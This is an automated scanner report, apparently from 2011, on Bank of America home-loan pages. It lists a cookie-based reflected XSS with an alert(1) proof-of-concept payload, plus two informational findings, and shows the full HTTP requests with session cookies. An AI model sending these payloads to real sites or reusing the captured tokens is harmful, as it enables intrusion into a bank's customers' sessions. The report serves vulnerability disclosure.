The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f825f'-alert(1)-'024c0d9dc59 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home-loans/refinance.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bankofamerica.com/help/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CTf825f'-alert(1)-'024c0d9dc59; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000vQtdPu5_bXsoGOtZH_YsQ9d:14b1t9a7b; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:06:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 31814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

   
...[SNIP]...
AddVars('page','Product','mortgage');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('page','Section','Product');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('session','State-Cookie','CTf825f'-alert(1)-'024c0d9dc59');
               lpMTagConfig.defaultInvite = "chat-" + lpUnit + '-' + lpLanguage;
           }catch(e){}    
       </SCRIPT>
...[SNIP]...

2. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/surveyInitPopupAction.go

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CT; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000vQtdPu5_bXsoGOtZH_YsQ9d:14b1t9a7b; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:05:05 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 532


                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?
...[SNIP]...

3. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www9.bankofamerica.com
Path:   /home-loans/surveyInitPopupAction.go

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CT; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000vQtdPu5_bXsoGOtZH_YsQ9d:14b1t9a7b; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:05:05 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 532


                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?
...[SNIP]...

Report generated by XSS.CX at Fri Sep 30 14:42:16 CDT 2011.